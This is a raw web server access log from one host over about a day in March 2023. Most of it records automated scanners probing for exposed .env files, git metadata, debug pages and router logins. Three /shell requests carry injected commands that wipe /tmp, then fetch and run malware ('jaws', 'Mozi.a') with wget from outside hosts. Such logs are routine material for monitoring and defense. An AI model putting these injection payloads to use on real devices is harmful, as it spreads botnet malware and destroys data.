185.254.196.173 - - [26/Mar/2023:03:45:38 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [26/Mar/2023:03:45:39 +0000] "POST / HTTP/1.1" 405 409718 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [26/Mar/2023:04:24:32 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
205.210.31.18 - - [26/Mar/2023:04:38:29 +0000] "GET / HTTP/1.1" 200 41226 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
43.154.128.189 - - [26/Mar/2023:04:43:18 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.105.128.12 - - [26/Mar/2023:04:53:33 +0000] "\x16\x03\x01" 400 226 "-" "-"
52.15.42.151 - - [26/Mar/2023:05:26:50 +0000] "GET /.git/config HTTP/1.1" 200 - "-" "python-requests/2.28.2"
52.15.42.151 - - [26/Mar/2023:05:26:51 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
52.15.42.151 - - [26/Mar/2023:05:26:52 +0000] "POST /.env HTTP/1.1" 405 411963 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
52.15.42.151 - - [26/Mar/2023:05:26:54 +0000] "GET /frontend_dev.php/$ HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
52.15.42.151 - - [26/Mar/2023:05:26:56 +0000] "GET /debug/default/view?panel=config HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
52.15.42.151 - - [26/Mar/2023:05:26:59 +0000] "GET /.json HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
52.15.42.151 - - [26/Mar/2023:05:27:01 +0000] "GET /config.json HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
52.15.42.151 - - [26/Mar/2023:05:27:11 +0000] "GET /phpinfo.php HTTP/1.1" 200 23912 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
180.149.125.168 - - [26/Mar/2023:05:34:26 +0000] "GET /c/ HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
180.149.125.168 - - [26/Mar/2023:05:34:26 +0000] "GET /c HTTP/1.1" 200 - "http://13.244.159.169/c/" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
135.125.246.189 - - [26/Mar/2023:05:54:55 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [26/Mar/2023:05:54:56 +0000] "POST / HTTP/1.1" 405 409746 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [26/Mar/2023:06:01:12 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.225.74.201 - - [26/Mar/2023:06:09:56 +0000] "GET / HTTP/1.1" 200 8386 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
135.125.246.189 - - [26/Mar/2023:06:27:36 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [26/Mar/2023:06:27:36 +0000] "POST / HTTP/1.1" 405 409734 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
66.115.189.137 - - [26/Mar/2023:06:33:10 +0000] "GET /apis/apps/v1/namespaces/kube-system/daemonsets HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0"
45.79.172.21 - - [26/Mar/2023:06:53:49 +0000] "\x16\x03\x01" 400 226 "-" "-"
46.201.88.18 - - [26/Mar/2023:07:11:53 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
43.154.128.189 - - [26/Mar/2023:07:19:06 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.32.162.159 - - [26/Mar/2023:07:25:14 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
192.241.237.17 - - [26/Mar/2023:07:46:57 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 zgrab/0.x"
122.195.196.63 - - [26/Mar/2023:07:54:50 +0000] "GET / HTTP/1.1" 200 41226 "-" "Hello World"
91.139.2.18 - - [26/Mar/2023:07:56:15 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
185.180.143.72 - - [26/Mar/2023:08:13:50 +0000] "GET / HTTP/1.1" 200 8380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
135.125.246.189 - - [26/Mar/2023:08:29:52 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [26/Mar/2023:08:29:53 +0000] "POST / HTTP/1.1" 405 409718 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [26/Mar/2023:08:37:24 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
47.147.54.112 - - [26/Mar/2023:08:50:17 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
23.251.102.74 - - [26/Mar/2023:08:51:09 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
172.104.11.46 - - [26/Mar/2023:08:54:07 +0000] "\x16\x03\x01" 400 226 "-" "-"
94.102.51.9 - - [26/Mar/2023:09:46:25 +0000] "GET / HTTP/1.1" 200 8371 "-" "Mozilla/5.0 (Linux; Android 7.0; SAMSUNG SM-G925R6 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36"
120.86.253.68 - - [26/Mar/2023:09:51:32 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 200 - "-" "Hello, world"
43.154.128.189 - - [26/Mar/2023:09:55:26 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
192.241.214.15 - - [26/Mar/2023:10:17:07 +0000] "MGLNDD_13.244.159.169_80\n" 400 226 "-" "-"
135.125.246.189 - - [26/Mar/2023:10:36:32 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [26/Mar/2023:10:36:32 +0000] "POST / HTTP/1.1" 405 409684 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.79.181.251 - - [26/Mar/2023:10:57:33 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.154.128.189 - - [26/Mar/2023:11:13:23 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
103.61.101.106 - - [26/Mar/2023:11:44:09 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
135.125.246.189 - - [26/Mar/2023:11:45:20 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [26/Mar/2023:11:45:21 +0000] "POST / HTTP/1.1" 405 409730 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
104.248.12.1 - - [26/Mar/2023:12:21:21 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
43.154.128.189 - - [26/Mar/2023:12:31:13 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.254.196.173 - - [26/Mar/2023:13:01:04 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [26/Mar/2023:13:01:05 +0000] "POST / HTTP/1.1" 405 409710 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [26/Mar/2023:13:06:24 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [26/Mar/2023:13:06:24 +0000] "POST / HTTP/1.1" 405 409698 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [26/Mar/2023:13:40:30 +0000] "GET / HTTP/1.1" 200 8386 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.244.227.91 - - [26/Mar/2023:13:46:58 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
43.154.128.189 - - [26/Mar/2023:13:49:34 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
95.182.122.28 - - [26/Mar/2023:13:51:01 +0000] "GET / HTTP/1.1" 200 41226 "-" "-"
80.137.56.160 - - [26/Mar/2023:13:51:11 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
5.235.234.224 - - [26/Mar/2023:13:53:26 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
193.32.162.159 - - [26/Mar/2023:14:22:14 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
135.125.246.189 - - [26/Mar/2023:14:42:49 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [26/Mar/2023:14:42:49 +0000] "POST / HTTP/1.1" 405 409730 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
206.189.139.42 - - [26/Mar/2023:15:10:01 +0000] "GET /aaa9 HTTP/1.1" 200 - "-" "Mozilla/5.0 zgrab/0.x"
206.189.139.42 - - [26/Mar/2023:15:10:02 +0000] "GET /aab8 HTTP/1.1" 200 - "-" "Mozilla/5.0 zgrab/0.x"
206.189.139.42 - - [26/Mar/2023:15:10:03 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 zgrab/0.x"
34.77.199.190 - - [26/Mar/2023:16:08:34 +0000] "GET / HTTP/1.1" 200 8387 "-" "python-requests/2.28.2"
43.154.128.189 - - [26/Mar/2023:16:28:35 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.246.189 - - [26/Mar/2023:16:30:05 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [26/Mar/2023:16:30:05 +0000] "POST / HTTP/1.1" 405 409742 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.223.129.59 - - [26/Mar/2023:16:32:20 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0"
45.79.181.223 - - [26/Mar/2023:16:47:47 +0000] "\x16\x03\x01" 400 226 "-" "-"
45.79.181.104 - - [26/Mar/2023:16:59:35 +0000] "\x16\x03\x01" 400 226 "-" "-"
135.125.246.189 - - [26/Mar/2023:17:04:38 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [26/Mar/2023:17:04:39 +0000] "POST / HTTP/1.1" 405 409742 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
176.212.196.227 - - [26/Mar/2023:17:18:07 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0"
185.254.196.173 - - [26/Mar/2023:17:25:17 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [26/Mar/2023:17:25:18 +0000] "POST / HTTP/1.1" 405 409732 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
139.144.225.136 - - [26/Mar/2023:17:43:19 +0000] "\x16\x03\x01\x01\xfd\x01" 400 226 "-" "-"
43.154.128.189 - - [26/Mar/2023:17:46:26 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
45.81.243.34 - - [26/Mar/2023:18:15:45 +0000] "-" 408 - "-" "-"
185.225.74.201 - - [26/Mar/2023:18:53:34 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 405 423624 "http://13.244.159.169:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
135.125.246.189 - - [26/Mar/2023:18:54:26 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [26/Mar/2023:18:54:27 +0000] "POST / HTTP/1.1" 405 409734 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [26/Mar/2023:19:04:06 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
54.149.73.163 - - [26/Mar/2023:19:05:25 +0000] "GET /.git/HEAD HTTP/1.1" 200 - "-" "Python-urllib/3.9"
45.128.232.149 - - [26/Mar/2023:19:26:39 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 405 423596 "http://13.244.159.169:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
54.149.73.163 - - [26/Mar/2023:19:35:35 +0000] "GET /.git/HEAD HTTP/1.1" 200 - "-" "Python-urllib/3.9"
185.225.74.42 - - [26/Mar/2023:19:58:36 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 405 423579 "http://13.244.159.169:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
43.154.128.189 - - [26/Mar/2023:20:21:47 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.246.189 - - [26/Mar/2023:20:34:56 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [26/Mar/2023:20:34:56 +0000] "POST / HTTP/1.1" 405 409748 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [26/Mar/2023:20:43:12 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
135.125.246.189 - - [26/Mar/2023:21:23:05 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [26/Mar/2023:21:23:06 +0000] "POST / HTTP/1.1" 405 409738 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.104.11.34 - - [26/Mar/2023:21:28:23 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.79.172.21 - - [26/Mar/2023:21:32:50 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.154.128.189 - - [26/Mar/2023:21:39:27 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
2.195.235.116 - - [26/Mar/2023:21:49:50 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
20.163.104.4 - - [26/Mar/2023:22:27:08 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.163.104.4 - - [26/Mar/2023:22:27:09 +0000] "POST / HTTP/1.1" 405 409727 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [26/Mar/2023:22:34:49 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
47.90.248.26 - - [26/Mar/2023:22:45:35 +0000] "GET / HTTP/1.0" 200 41463 "-" "-"
47.90.248.26 - - [26/Mar/2023:22:47:01 +0000] "GET /1679870820 HTTP/1.1" 200 - "-" "Mozilla/5.0"
47.90.248.26 - - [26/Mar/2023:22:47:01 +0000] "GET / HTTP/1.0" 200 41463 "-" "-"
47.90.248.26 - - [26/Mar/2023:22:47:01 +0000] "GET /text/try1679870820 HTTP/1.1" 200 - "-" "Mozilla/5.0"
47.90.248.26 - - [26/Mar/2023:22:47:01 +0000] "POST /sdk HTTP/1.1" 405 406137 "-" "Mozilla/5.0"
47.90.248.26 - - [26/Mar/2023:22:47:11 +0000] "\x16\x03\x01\x02" 400 226 "-" "-"
47.90.248.26 - - [26/Mar/2023:22:47:21 +0000] "GET / HTTP/1.0" 200 41463 "-" "-"
47.90.248.26 - - [26/Mar/2023:22:47:21 +0000] "GET / HTTP/1.1" 200 41226 "-" "-"
47.90.248.26 - - [26/Mar/2023:22:47:22 +0000] "GET / HTTP/1.1" 200 8387 "-" "Openwave/ UCWEB7.0.2.37/28/999"
47.90.248.26 - - [26/Mar/2023:22:47:23 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "curl/7.75.0"
47.90.248.26 - - [26/Mar/2023:22:47:24 +0000] "GET /robots.txt HTTP/1.1" 200 24 "-" "curl/7.75.0"
135.125.246.189 - - [26/Mar/2023:22:52:58 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [26/Mar/2023:22:52:59 +0000] "POST / HTTP/1.1" 405 409712 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.104.11.46 - - [26/Mar/2023:22:53:56 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.154.128.189 - - [26/Mar/2023:22:57:26 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
43.154.128.189 - - [27/Mar/2023:00:15:20 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
87.236.176.123 - - [27/Mar/2023:00:59:30 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
87.236.176.68 - - [27/Mar/2023:00:59:31 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
87.236.176.199 - - [27/Mar/2023:00:59:31 +0000] "GET /assets/img/apple-touch-icon.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
135.125.246.189 - - [27/Mar/2023:01:28:05 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [27/Mar/2023:01:28:05 +0000] "POST / HTTP/1.1" 405 409766 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [27/Mar/2023:01:33:10 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
188.166.237.228 - - [27/Mar/2023:02:16:35 +0000] "\x16\x03\x01" 400 226 "-" "-"
188.166.237.228 - - [27/Mar/2023:02:16:36 +0000] "\x16\x03\x01" 400 226 "-" "-"
188.166.237.228 - - [27/Mar/2023:02:16:36 +0000] "GET / HTTP/1.1" 200 8379 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
188.166.237.228 - - [27/Mar/2023:02:16:37 +0000] "GET /client/get_targets HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
188.166.237.228 - - [27/Mar/2023:02:16:38 +0000] "GET /upl.php HTTP/1.1" 200 - "-" "Mozilla/5.0"
188.166.237.228 - - [27/Mar/2023:02:16:40 +0000] "GET /geoip/ HTTP/1.1" 301 235 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
188.166.237.228 - - [27/Mar/2023:02:16:41 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)"
205.210.31.12 - - [27/Mar/2023:02:20:52 +0000] "GET / HTTP/1.1" 200 41226 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
198.235.24.13 - - [27/Mar/2023:02:23:46 +0000] "GET / HTTP/1.0" 200 41463 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
135.125.246.189 - - [27/Mar/2023:02:46:31 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [27/Mar/2023:02:46:31 +0000] "POST / HTTP/1.1" 405 409712 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.105.128.13 - - [27/Mar/2023:02:50:19 +0000] "\x16\x03\x01" 400 226 "-" "-"
